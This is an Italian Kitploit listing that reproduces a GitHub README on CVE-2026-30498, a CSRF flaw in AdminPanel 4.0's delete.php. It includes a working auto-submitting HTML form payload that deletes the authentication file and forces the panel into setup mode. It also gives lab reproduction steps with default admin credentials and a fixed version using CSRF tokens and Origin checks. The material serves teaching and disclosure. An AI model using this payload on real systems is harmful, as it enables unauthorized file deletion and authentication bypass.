Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30498 — Dimostrazione educativa della vulnerabilità CSRF in un ambiente di laboratorio controllato, inclusi un exploit proof-of-concept e una versione corretta con adeguate protezioni CSRF. | Kitploit
Strumenti/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

Dimostrazione educativa della vulnerabilità CSRF in un ambiente di laboratorio controllato, inclusi un exploit proof-of-concept e una versione corretta con adeguate protezioni CSRF.

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-30498 – Vulnerabilità CSRF (AdminPanel 4.0)


Panoramica

ID CVE: CVE-2026-30498 (Riservato da MITRE)
Scopritore: Mehdi Ben Hamou

Esiste una vulnerabilità di Cross-Site Request Forgery (CSRF) nell'endpoint delete.php di AdminPanel 4.0.

Questa vulnerabilità consente a un attaccante di attivare azioni sensibili (eliminazione di file) per conto di un utente autenticato senza il suo consenso.


Dettagli Tecnici

La vulnerabilità è causata dall'assenza di protezioni CSRF:

  • Nessuna validazione del token CSRF
  • Nessuna validazione di Origin / Referer
  • Azione sensibile esposta tramite richiesta GET
  • Nessuna verifica dell'intenzione dell'utente

L'endpoint vulnerabile elabora le richieste direttamente in base alla sessione dell'utente senza validare l'origine della richiesta.


Impatto

Lo sfruttamento riuscito porta a:

  • Eliminazione di verifyPanel.php
  • Bypass dell'autenticazione
  • L'applicazione entra in modalità di configurazione
  • Possibile reinizializzazione completa del sistema

  • Versione Interessata

    • AdminPanel 4.0 e precedenti (progetto archiviato)

    Scenario di Attacco

    Un attaccante ospita una pagina web dannosa che invia una richiesta falsificata:

    root@kitploit:~
    http://localhost:8080/delete.php?file=verifyPanel.php
    

    Quando una vittima (utente autenticato) visita questa pagina, il browser include automaticamente i cookie di sessione e la richiesta viene eseguita.


    Proof of Concept (PoC)

    Pagina Dannosa (Attaccante)

    root@kitploit:~
    <form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
      <input type="hidden" name="file" value="verifyPanel.php">
    </form>
    <script>
      document.getElementById("csrfForm").submit();
    </script>
    

    Questa richiesta viene inviata automaticamente con il cookie di sessione della vittima.


    Passaggi per la Riproduzione

    1. Avvia il server della vittima:
    root@kitploit:~
    php -S localhost:8080
    
    1. Accedi alla pagina di login:
    root@kitploit:~
    http://localhost:8080
    
    1. Effettua il login con:
    root@kitploit:~
    admin / admin123
    
    1. Apri la pagina dell'attaccante:
    root@kitploit:~
    http://localhost:8081/evil.html
    
    1. Lancia l'attacco CSRF
    2. Torna alla dashboard:
    root@kitploit:~
    /panel/dashboard.php
    

    Cosa Succede Internamente

    1. La vittima accede → viene creato il cookie di sessione
    2. La pagina dell'attaccante invia una richiesta falsificata
    3. Il browser allega automaticamente il cookie
    4. Il server esegue l'eliminazione senza verifica
    5. Il sistema rileva il file di autenticazione mancante
    6. L'applicazione entra in modalità di configurazione

    Ambiente di Laboratorio (Simulazione Pedagogica)

    Questo repository include un ambiente di laboratorio controllato per riprodurre la vulnerabilità in sicurezza.

    Importante: Questo laboratorio è una simulazione e non rappresenta il codice originale esatto di AdminPanel.

    Reset del Laboratorio

    Per ripristinare l'ambiente:

    root@kitploit:~
    /reset.php
    

    Versione Corretta (Mitigazione)

    Una versione sicura è implementata in:

    root@kitploit:~
    delete_fixed.php
    

    Protezioni aggiunte:

    • ✅ Validazione del token CSRF
    • ✅ Solo metodo POST
    • ✅ Validazione di Origin / Referer
    • ✅ Validazione della sessione

    Perché la Correzione Funziona

    • L'attaccante non può accedere al token CSRF (Same-Origin Policy)
    • Le richieste falsificate mancano di un token valido → rifiutate
    • Le richieste cross-origin vengono bloccate tramite il controllo di Origin

    Struttura del Progetto

    root@kitploit:~
    victim/
    ├── index.php
    ├── delete.php
    ├── delete_fixed.php
    ├── reset.php
    └── panel/
        └── dashboard.php
    
    attacker/
    └── evil.html
    

    Disclaimer

    Questo progetto è destinato esclusivamente a scopi educativi e di ricerca.
    Non utilizzare questa vulnerabilità su sistemi senza la dovuta autorizzazione.

    Scarica lo strumento